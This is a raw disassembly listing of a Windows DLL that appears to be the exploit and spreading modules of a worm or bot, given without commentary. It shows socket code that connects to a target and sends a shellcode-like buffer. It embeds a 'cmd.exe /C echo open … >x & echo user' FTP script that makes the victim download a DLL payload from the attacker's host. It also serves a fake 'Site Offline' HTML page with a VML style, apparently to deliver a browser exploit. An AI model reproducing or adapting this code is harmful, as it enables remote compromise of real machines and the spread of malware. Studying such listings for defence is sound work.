push 100h ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call sub_1000180B
add esp, 10h
mov eax, [ebp+len]
push eax ; len
mov ecx, [ebp+Memory]
push ecx ; int
mov edx, [ebp+s]
push edx ; s
call sub_10001991
add esp, 0Ch
and eax, 0FFh
test eax, eax
jnz short loc_10001BAB
mov eax, [ebp+Memory]
push eax ; Memory
call ds:free ; free
add esp, 4
xor al, al
jmp short loc_10001BD7
; ---------------------------------------------------------------------------
loc_10001BAB: ; CODE XREF: sub_100019DF+1B6�j
push 0 ; flags
push 100h ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call sub_1000180B
add esp, 10h
mov eax, [ebp+Memory]
push eax ; Memory
call ds:free ; free
add esp, 4
mov al, 1
loc_10001BD7: ; CODE XREF: sub_100019DF+36�j
; sub_100019DF+179�j ...
mov esp, ebp
pop ebp
retn
sub_100019DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10001BDB(SOCKET s,void *Src,int)
sub_10001BDB proc near ; CODE XREF: sub_10001EBF+193�p
buf = byte ptr -20h
s = dword ptr 8
Src = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0 ; flags
push 48h ; len
push offset buf ; ""
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
cmp eax, 48h
jz short loc_10001BFD
xor al, al
jmp short loc_10001C41
; ---------------------------------------------------------------------------
loc_10001BFD: ; CODE XREF: sub_10001BDB+1C�j
push 0 ; flags
push 20h ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call sub_1000180B
add esp, 10h
cmp eax, 0FFFFFFFFh
jnz short loc_10001C1A
xor al, al
jmp short loc_10001C41
; ---------------------------------------------------------------------------
loc_10001C1A: ; CODE XREF: sub_10001BDB+39�j
mov eax, dword ptr [ebp+buf]
and eax, 0FFh
cmp eax, 82h
jz short loc_10001C2D
xor al, al
jmp short loc_10001C41
; ---------------------------------------------------------------------------
loc_10001C2D: ; CODE XREF: sub_10001BDB+4C�j
mov ecx, [ebp+arg_8]
push ecx ; int
mov edx, [ebp+Src]
push edx ; Src
mov eax, [ebp+s]
push eax ; s
call sub_100019DF
add esp, 0Ch
loc_10001C41: ; CODE XREF: sub_10001BDB+20�j
; sub_10001BDB+3D�j ...
mov esp, ebp
pop ebp
retn
sub_10001BDB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001C45 proc near ; CODE XREF: .text:10001CFB�p
var_2C = qword ptr -2Ch
var_24 = qword ptr -24h
var_1C = qword ptr -1Ch
var_14 = qword ptr -14h
var_C = qword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 24h
mov eax, [ebp+arg_0]
shl eax, 3
mov dword ptr [ebp+var_C], eax
mov dword ptr [ebp+var_C+4], 0
fild [ebp+var_C]
fdiv ds:dbl_1000C220
call _ftol ; _ftol
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
mov dword ptr [ebp+var_14], ecx
mov dword ptr [ebp+var_14+4], 0
fild [ebp+var_14]
fstp [ebp+var_1C]
mov edx, [ebp+var_4]
mov dword ptr [ebp+var_24], edx
mov dword ptr [ebp+var_24+4], 0
fild [ebp+var_24]
fdiv ds:dbl_1000C218
sub esp, 8
fstp [esp+2Ch+var_2C]
call ds:floor ; floor
add esp, 8
fadd st, st
fadd [ebp+var_1C]
call _ftol ; _ftol
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_10001C45 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_1000BC72
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 38h
mov dword ptr [ebp-3Ch], 0
lea eax, [ebp-38h]
push eax
lea ecx, [ebp-20h]
call ds:??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(basic_string<char,std::char_traits<char>,std::allocator<char>>::allocator<char> const &)
mov dword ptr [ebp-4], 1
mov ecx, [ebp+10h]
push ecx
call sub_10001C45
add esp, 4
push eax
lea ecx, [ebp-20h]
call ds:?reserve@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::reserve(uint)
mov dword ptr [ebp-10h], 0
loc_10001D14: ; CODE XREF: .text:loc_10001E87�j
cmp dword ptr [ebp+10h], 0
jbe loc_10001E8C
cmp dword ptr [ebp+10h], 3
jb short loc_10001D2D
mov dword ptr [ebp-30h], 3
jmp short loc_10001D49
; ---------------------------------------------------------------------------
loc_10001D2D: ; CODE XREF: .text:10001D22�j
cmp dword ptr [ebp+10h], 2
jnz short loc_10001D3C
mov dword ptr [ebp-30h], 2
jmp short loc_10001D49
; ---------------------------------------------------------------------------
loc_10001D3C: ; CODE XREF: .text:10001D31�j
cmp dword ptr [ebp+10h], 1
jnz short loc_10001D49
mov dword ptr [ebp-30h], 1
loc_10001D49: ; CODE XREF: .text:10001D2B�j
; .text:10001D3A�j ...
mov edx, [ebp-30h]
mov [ebp-44h], edx
mov dword ptr [ebp-40h], 0
fild qword ptr [ebp-44h]
fmul ds:dbl_1000C228
fdiv ds:dbl_1000C220
sub esp, 8
fstp qword ptr [esp]
call ds:ceil ; ceil
add esp, 8
call _ftol ; _ftol
mov [ebp-2Ch], eax
mov dword ptr [ebp-34h], 0
jmp short loc_10001D8E
; ---------------------------------------------------------------------------
loc_10001D85: ; CODE XREF: .text:10001DA5�j
mov eax, [ebp-34h]
add eax, 1
mov [ebp-34h], eax
loc_10001D8E: ; CODE XREF: .text:10001D83�j
mov ecx, [ebp-34h]
cmp ecx, [ebp-30h]
jnb short loc_10001DA7
mov edx, [ebp+0Ch]
add edx, [ebp-34h]
mov eax, [ebp-34h]
mov cl, [edx]
mov [ebp+eax-28h], cl
jmp short loc_10001D85
; ---------------------------------------------------------------------------
loc_10001DA7: ; CODE XREF: .text:10001D94�j
mov edx, [ebp+0Ch]
add edx, [ebp-30h]
mov [ebp+0Ch], edx
mov eax, [ebp+10h]
sub eax, [ebp-30h]
mov [ebp+10h], eax
movsx ecx, byte ptr [ebp-28h]
and ecx, 0FCh
sar ecx, 2
mov [ebp-24h], cl
movsx edx, byte ptr [ebp-28h]
and edx, 3
shl edx, 4
movsx eax, byte ptr [ebp-27h]
and eax, 0F0h
sar eax, 4
add edx, eax
mov [ebp-23h], dl
movsx ecx, byte ptr [ebp-27h]
and ecx, 0Fh
movsx edx, byte ptr [ebp-26h]
and edx, 0C0h
sar edx, 6
lea eax, [edx+ecx*4]
mov [ebp-22h], al
movsx ecx, byte ptr [ebp-26h]
and ecx, 3Fh
mov [ebp-21h], cl
mov dword ptr [ebp-34h], 0
jmp short loc_10001E1A
; ---------------------------------------------------------------------------
loc_10001E11: ; CODE XREF: .text:10001E45�j
mov edx, [ebp-34h]
add edx, 1
mov [ebp-34h], edx
loc_10001E1A: ; CODE XREF: .text:10001E0F�j
mov eax, [ebp-34h]
cmp eax, [ebp-2Ch]
jnb short loc_10001E47
mov ecx, [ebp-34h]
movsx edx, byte ptr [ebp+ecx-24h]
mov al, byte_1000E1B0[edx]
push eax
push 1
lea ecx, [ebp-20h]
call ds:?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(uint,char)
mov ecx, [ebp-10h]
add ecx, 1
mov [ebp-10h], ecx
jmp short loc_10001E11
; ---------------------------------------------------------------------------
loc_10001E47: ; CODE XREF: .text:10001E20�j
cmp dword ptr [ebp-10h], 48h
jb short loc_10001E61
mov edx, [ebp+14h]
push edx
lea ecx, [ebp-20h]
call ds:?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(char const *)
mov dword ptr [ebp-10h], 0
loc_10001E61: ; CODE XREF: .text:10001E4B�j
mov eax, [ebp-2Ch]
mov [ebp-34h], eax
jmp short loc_10001E72
; ---------------------------------------------------------------------------
loc_10001E69: ; CODE XREF: .text:10001E85�j
mov ecx, [ebp-34h]
add ecx, 1
mov [ebp-34h], ecx
loc_10001E72: ; CODE XREF: .text:10001E67�j
cmp dword ptr [ebp-34h], 4
jnb short loc_10001E87
push 3Dh
push 1
lea ecx, [ebp-20h]
call ds:?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(uint,char)
jmp short loc_10001E69
; ---------------------------------------------------------------------------
loc_10001E87: ; CODE XREF: .text:10001E76�j
jmp loc_10001D14
; ---------------------------------------------------------------------------
loc_10001E8C: ; CODE XREF: .text:10001D18�j
lea edx, [ebp-20h]
push edx
mov ecx, [ebp+8]
call ds:??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>>(basic_string<char,std::char_traits<char>,std::allocator<char>>::basic_string<char,std::char_traits<char>,std::allocator<char>> const &)
mov eax, [ebp-3Ch]
or al, 1
mov [ebp-3Ch], eax
mov byte ptr [ebp-4], 0
lea ecx, [ebp-20h]
call ds:??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string<char,std::char_traits<char>,std::allocator<char>>(void)
mov eax, [ebp+8]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10001EBF proc near ; DATA XREF: sub_1000A1A9+26E�o
var_44C = byte ptr -44Ch
name = sockaddr ptr -444h
Dest = byte ptr -434h
var_424 = dword ptr -424h
Src = dword ptr -420h
var_41C = dword ptr -41Ch
hostshort = word ptr -418h
var_414 = dword ptr -414h
var_410 = dword ptr -410h
Dst = byte ptr -40Ch
var_40B = byte ptr -40Bh
var_37D = byte ptr -37Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
s = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 44Ch
push edi
mov [ebp+Dst], 0
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_40B]
rep stosd
stosw
stosb
mov eax, [ebp+arg_0]
mov ecx, [eax]
mov dword ptr [ebp+hostshort], ecx
mov edx, [eax+4]
mov [ebp+var_414], edx
mov eax, [eax+8]
mov [ebp+var_410], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
mov byte ptr [edx+8], 1
push 8Fh ; Size
push offset dword_1000E35C ; Src
lea eax, [ebp+Dst]
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
call sub_10006FA2
push eax
push offset Format ; "%s.dll"
push 10h ; Count
lea ecx, [ebp+Dest]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
lea edx, [ebp+Dest]
push edx
lea eax, [ebp+Dest]
push eax
xor ecx, ecx
mov cx, hostshort
push ecx
push offset Dest
push offset aCmd_exeCEchoOp ; "cmd.exe /C echo open %s %hu>x&echo user"...
push 400h ; Count
lea edx, [ebp+var_37D]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 1Ch
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, 90h
mov [ebp+var_424], eax
mov ecx, [ebp+var_424]
push ecx
lea edx, [ebp+Dst]
push edx
push 164h
push offset aSvwfbA ; "SVWfì€"
lea eax, [ebp+var_44C]
push eax
call sub_10001433
add esp, 14h
mov ecx, [eax]
mov edx, [eax+4]
mov [ebp+Src], ecx
mov [ebp+var_41C], edx
cmp [ebp+var_41C], 0
jnz short loc_10001FD6
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
loc_10001FD6: ; CODE XREF: sub_10001EBF+10A�j
push 6 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0FFFFFFFFh
jz short loc_10002064
mov [ebp+name.sa_family], 2
mov ax, [ebp+hostshort]
push eax ; hostshort
call ds:htons ; htons
mov word ptr [ebp+name.sa_data], ax
mov ecx, [ebp+var_414]
mov dword ptr [ebp+name.sa_data+2], ecx
push 8 ; Size
push 0 ; Val
lea edx, [ebp+name.sa_data+6]
push edx ; Dst
call memset ; memset
add esp, 0Ch
push 10h ; namelen
lea eax, [ebp+name]
push eax ; name
mov ecx, [ebp+s]
push ecx ; s
call ds:connect ; connect
cmp eax, 0FFFFFFFFh
jz short loc_1000205A
mov edx, [ebp+var_41C]
push edx ; int
mov eax, [ebp+Src]
push eax ; Src
mov ecx, [ebp+s]
push ecx ; s
call sub_10001BDB
add esp, 0Ch
loc_1000205A: ; CODE XREF: sub_10001EBF+17F�j
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
loc_10002064: ; CODE XREF: sub_10001EBF+12A�j
lea ecx, [ebp+Src]
call sub_1000113B
push 0
call ds:_endthreadex ; _endthreadex
add esp, 4
xor eax, eax
pop edi
mov esp, ebp
pop ebp
retn 4
sub_10001EBF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10002083 proc near ; DATA XREF: .data:1000E004�o
push ebp
mov ebp, esp
call sub_10002092
call sub_100020A2
pop ebp
retn
sub_10002083 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10002092 proc near ; CODE XREF: sub_10002083+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_10012A41
call ds:??0Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::Init(void)
pop ebp
retn
sub_10002092 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100020A2 proc near ; CODE XREF: sub_10002083+8�p
push ebp
mov ebp, esp
push offset sub_100020B4 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_100020A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_100020B4()
sub_100020B4 proc near ; DATA XREF: sub_100020A2+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_10012A41
call ds:??1Init@ios_base@std@@QAE@XZ ; std::ios_base::Init::~Init(void)
pop ebp
retn
sub_100020B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100020C4 proc near ; DATA XREF: .data:1000E008�o
push ebp
mov ebp, esp
call sub_100020D3
call sub_100020E3
pop ebp
retn
sub_100020C4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100020D3 proc near ; CODE XREF: sub_100020C4+3�p
push ebp
mov ebp, esp
mov ecx, offset byte_10012A40
call ds:??0_Winit@std@@QAE@XZ ; std::_Winit::_Winit(void)
pop ebp
retn
sub_100020D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100020E3 proc near ; CODE XREF: sub_100020C4+8�p
push ebp
mov ebp, esp
push offset sub_100020F5 ; void (__cdecl *)()
call _atexit
add esp, 4
pop ebp
retn
sub_100020E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; void __cdecl sub_100020F5()
sub_100020F5 proc near ; DATA XREF: sub_100020E3+3�o
push ebp
mov ebp, esp
mov ecx, offset byte_10012A40
call ds:??1_Winit@std@@QAE@XZ ; std::_Winit::~_Winit(void)
pop ebp
retn
sub_100020F5 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10002110(char *Str)
sub_10002110 proc near ; CODE XREF: sub_10002157+26A�p
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0
jmp short loc_10002126
; ---------------------------------------------------------------------------
loc_1000211D: ; CODE XREF: sub_10002110:loc_1000214E�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
loc_10002126: ; CODE XREF: sub_10002110+B�j
mov ecx, [ebp+Str]
push ecx ; Str
call strlen ; strlen
add esp, 4
cmp [ebp+var_4], eax
jnb short loc_10002150
mov edx, [ebp+Str]
add edx, [ebp+var_4]
movsx eax, byte ptr [edx]
cmp eax, 5Ch
jnz short loc_1000214E
mov ecx, [ebp+Str]
add ecx, [ebp+var_4]
mov byte ptr [ecx], 2Fh
loc_1000214E: ; CODE XREF: sub_10002110+33�j
jmp short loc_1000211D
; ---------------------------------------------------------------------------
loc_10002150: ; CODE XREF: sub_10002110+25�j
mov eax, [ebp+Str]
mov esp, ebp
pop ebp
retn
sub_10002110 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10002157(char Parameter,int,__int16,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,__int16,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,__int16,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,int,__int16,SOCKET s,char *Source)
sub_10002157 proc near ; CODE XREF: sub_1000329E+652�p
var_318 = dword ptr -318h
var_311 = byte ptr -311h
hObject = dword ptr -310h
Str = byte ptr -30Ch
var_30B = byte ptr -30Bh
var_30A = byte ptr -30Ah
var_20C = dword ptr -20Ch
Dst = byte ptr -208h
var_108 = dword ptr -108h
var_104 = dword ptr -104h
FileName = byte ptr -100h
Parameter = byte ptr 8
arg_4 = dword ptr 0Ch
Dest = byte ptr 12h
arg_10A = byte ptr 112h
arg_20A = byte ptr 212h
arg_30A = byte ptr 312h
s = dword ptr 313h
Source = dword ptr 318h
push ebp
mov ebp, esp
sub esp, 318h
push esi
mov byte ptr [ebp+var_20C], 0
push 100h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+Source]
movsx edx, byte ptr [ecx]
cmp edx, 2Fh
jz short loc_100021AF
mov eax, [ebp+Source]
push eax
push offset aS_5 ; "\\%s"
push 0FFh ; Count
lea ecx, [ebp+Str]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
jmp short loc_100021D4
; ---------------------------------------------------------------------------
loc_100021AF: ; CODE XREF: sub_10002157+33�j
mov edx, [ebp+Source]
mov byte ptr [edx], 5Ch
push 0FFh ; Count
mov eax, [ebp+Source]
push eax ; Source
lea ecx, [ebp+Str]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
loc_100021D4: ; CODE XREF: sub_10002157+56�j
mov [ebp+var_104], 0
mov [ebp+var_108], 0
jmp short loc_10002208
; ---------------------------------------------------------------------------
loc_100021EA: ; CODE XREF: sub_10002157:loc_100022D9�j
mov edx, [ebp+var_104]
add edx, 1
mov [ebp+var_104], edx
mov eax, [ebp+var_108]
add eax, 1
mov [ebp+var_108], eax
loc_10002208: ; CODE XREF: sub_10002157+91�j
lea ecx, [ebp+Str]
push ecx ; Str
call strlen ; strlen
add esp, 4
cmp [ebp+var_104], eax
jnb loc_100022DE
mov esi, [ebp+var_104]
add esi, 2
lea edx, [ebp+Str]
push edx ; Str
call strlen ; strlen
add esp, 4
cmp esi, eax
jnb short loc_10002297
mov eax, [ebp+var_104]
movsx ecx, [ebp+eax+Str]
cmp ecx, 25h
jnz short loc_10002297
mov edx, [ebp+var_104]
movsx eax, [ebp+edx+var_30B]
cmp eax, 32h
jnz short loc_10002297
mov ecx, [ebp+var_104]
movsx edx, [ebp+ecx+var_30A]
cmp edx, 30h
jnz short loc_10002297
mov eax, [ebp+var_108]
mov [ebp+eax+Dst], 20h
mov ecx, [ebp+var_104]
add ecx, 2
mov [ebp+var_104], ecx
jmp short loc_100022D9
; ---------------------------------------------------------------------------
loc_10002297: ; CODE XREF: sub_10002157+E6�j
; sub_10002157+F9�j ...
mov edx, [ebp+var_104]
movsx eax, [ebp+edx+Str]
cmp eax, 2Fh
jnz short loc_100022B3
mov [ebp+var_311], 5Ch
jmp short loc_100022C6
; ---------------------------------------------------------------------------
loc_100022B3: ; CODE XREF: sub_10002157+151�j
mov ecx, [ebp+var_104]
mov dl, [ebp+ecx+Str]
mov [ebp+var_311], dl
loc_100022C6: ; CODE XREF: sub_10002157+15A�j
mov eax, [ebp+var_108]
mov cl, [ebp+var_311]
mov [ebp+eax+Dst], cl
loc_100022D9: ; CODE XREF: sub_10002157+13E�j
jmp loc_100021EA
; ---------------------------------------------------------------------------
loc_100022DE: ; CODE XREF: sub_10002157+C6�j
lea edx, [ebp+Dst]
push edx
lea eax, [ebp+arg_20A]
push eax
push offset aSS ; "%s%s"
push 0FFh ; Count
lea ecx, [ebp+FileName]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 14h
push offset Delim ; "\n"
lea edx, [ebp+FileName]
push edx ; Str
call ds:strtok ; strtok
add esp, 8
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:GetFileAttributesA ; GetFileAttributesA
mov [ebp+var_318], eax
cmp [ebp+var_318], 10h
jz short loc_10002342
cmp [ebp+var_318], 0FFFFFFFFh
jz short loc_1000234B
jmp short loc_1000235D
; ---------------------------------------------------------------------------
loc_10002342: ; CODE XREF: sub_10002157+1DE�j
mov byte ptr [ebp+var_20C], 1
jmp short loc_1000235D
; ---------------------------------------------------------------------------
loc_1000234B: ; CODE XREF: sub_10002157+1E7�j
mov ecx, [ebp+s+1]
push ecx ; s
call ds:closesocket ; closesocket
jmp loc_100024A0
; ---------------------------------------------------------------------------
loc_1000235D: ; CODE XREF: sub_10002157+1E9�j
; sub_10002157+1F2�j
mov edx, [ebp+var_108]
movsx eax, byte ptr [ebp+edx+var_20C+3]
cmp eax, 5Ch
jnz short loc_10002377
mov byte ptr [ebp+var_20C], 1
loc_10002377: ; CODE XREF: sub_10002157+217�j
mov ecx, [ebp+var_20C]
and ecx, 0FFh
test ecx, ecx
jz short loc_100023F5
push 0FFh ; Count
push offset Source ; "*"
lea edx, [ebp+FileName]
push edx ; Dest
call ds:strncat ; strncat
add esp, 0Ch
push 0FFh ; Count
lea eax, [ebp+FileName]
push eax ; Source
lea ecx, [ebp+Dest]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
lea edx, [ebp+Dst]
push edx ; Str
call sub_10002110
add esp, 4
push 0FFh ; Count
lea eax, [ebp+Dst]
push eax ; Source
lea ecx, [ebp+arg_10A]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
mov [ebp+arg_30A], 1
mov [ebp+arg_4], 0FFFFFFFFh
jmp short loc_1000245F
; ---------------------------------------------------------------------------
loc_100023F5: ; CODE XREF: sub_10002157+22E�j
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea edx, [ebp+FileName]
push edx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz short loc_1000245F
push 0FFh ; Count
lea eax, [ebp+FileName]
push eax ; Source
lea ecx, [ebp+Dest]
push ecx ; Dest
call ds:strncpy ; strncpy
add esp, 0Ch
mov [ebp+arg_30A], 0
push 0 ; lpFileSizeHigh
mov edx, [ebp+hObject]
push edx ; hFile
call ds:GetFileSize ; GetFileSize
mov [ebp+arg_4], eax
mov eax, [ebp+hObject]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000245F: ; CODE XREF: sub_10002157+29C�j
; sub_10002157+2C7�j
mov byte ptr [ebp+s], 0
push 0 ; lpThreadId
push 0 ; dwCreationFlags
lea ecx, [ebp+Parameter]
push ecx ; lpParameter
push offset StartAddress ; lpStartAddress
push 20000h ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
test eax, eax
jnz short loc_10002486
jmp short loc_100024A0
; ---------------------------------------------------------------------------
loc_10002486: ; CODE XREF: sub_10002157+32B�j
; sub_10002157+347�j
mov edx, [ebp+s]
and edx, 0FFh
test edx, edx
jnz short loc_100024A0
push 0Ah ; dwMilliseconds
call ds:Sleep ; Sleep
jmp short loc_10002486
; ---------------------------------------------------------------------------
loc_100024A0: ; CODE XREF: sub_10002157+201�j
; sub_10002157+32D�j ...
pop esi
mov esp, ebp
pop ebp
retn
sub_10002157 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_100024A5(SOCKET s,char *lpFileName,char *Source)
sub_100024A5 proc near ; CODE XREF: StartAddress+294�p
var_25F8 = dword ptr -25F8h
var_25F4 = dword ptr -25F4h
var_25F0 = byte ptr -25F0h
var_25E0 = byte ptr -25E0h
var_25DF = byte ptr -25DFh
var_2551 = byte ptr -2551h
var_1DE0 = dword ptr -1DE0h
var_1DDC = byte ptr -1DDCh
var_1DCC = byte ptr -1DCCh
var_1DCB = byte ptr -1DCBh
var_1D3D = byte ptr -1D3Dh
var_15CC = dword ptr -15CCh
var_15C8 = byte ptr -15C8h
var_15B8 = byte ptr -15B8h
var_15B7 = byte ptr -15B7h
var_1529 = byte ptr -1529h
var_DB8 = dword ptr -0DB8h
var_DB4 = dword ptr -0DB4h
Dest = byte ptr -0DB0h
var_DA0 = byte ptr -0DA0h
var_D9F = byte ptr -0D9Fh
var_D11 = byte ptr -0D11h
var_5A0 = dword ptr -5A0h
FileTime = _FILETIME ptr -59Ch
SystemTime = _SYSTEMTIME ptr -594h
var_584 = byte ptr -584h
Str1 = _WIN32_FIND_DATAA ptr -55Ch
Dst = byte ptr -41Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
hFindFile = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
buf = byte ptr -204h
var_4 = dword ptr -4
s = dword ptr 8
lpFileName = dword ptr 0Ch
Source = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 25F8h
call __alloca_probe
push edi
mov [ebp+var_31C], 0
mov [ebp+var_318], 0
mov [ebp+var_208], 0E6h
mov [ebp+var_20C], 96h
mov [ebp+var_210], 3Ch
mov [ebp+var_4], 1Eh
push 100h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push offset asc_1000E8B4 ; "\n"
mov ecx, [ebp+lpFileName]
push ecx ; Str
call ds:strtok ; strtok
add esp, 8
cmp [ebp+Source], 0
jz loc_10002891
mov edx, [ebp+lpFileName]
push edx ; Str
call strlen ; strlen
add esp, 4
mov ecx, [ebp+lpFileName]
mov byte ptr [ecx+eax-1], 0
mov edx, [ebp+lpFileName]
push edx
push offset aHead ; "<head>\r\n"
push 200h ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 10h
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
mov ecx, [ebp+lpFileName]
push ecx ; Str
call strlen ; strlen
add esp, 4
mov edx, [ebp+lpFileName]
mov byte ptr [edx+eax], 2Ah
mov eax, [ebp+var_210]
push eax
mov ecx, [ebp+var_20C]
push ecx
mov edx, [ebp+var_208]
push edx
push offset aTitleSiteOffli ; "<title>Site Offline.</title>\r\n"
push 200h ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 18h
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea edx, [ebp+buf]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:send ; send
push offset aStyle ; "<style>\r\n"
push 200h ; Count
lea ecx, [ebp+buf]
push ecx ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
push 0 ; flags
lea edx, [ebp+buf]
push edx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
mov ecx, [ebp+s]
push ecx ; s
call ds:send ; send
push offset aVBehaviorUrlDe ; "v:* { behavior: url(#default#VML); }\r\n"
push 200h ; Count
lea edx, [ebp+buf]
push edx ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
push 0 ; flags
lea eax, [ebp+buf]
push eax ; Str
call strlen ; strlen
add esp, 4
push eax ; len
lea ecx, [ebp+buf]
push ecx ; buf
mov edx, [ebp+s]
push edx ; s
call ds:send ; send
push offset aStyle_0 ; "</style>\r\n"
push 200h ; Count
lea eax, [ebp+buf]
push eax ; Dest
call ds:_snprintf ; _snprintf
add esp, 0Ch
push 0 ; flags
lea ecx, [ebp+buf]
push ecx ; Str
call strlen ; strlen
add esp, 4
push eax ; len
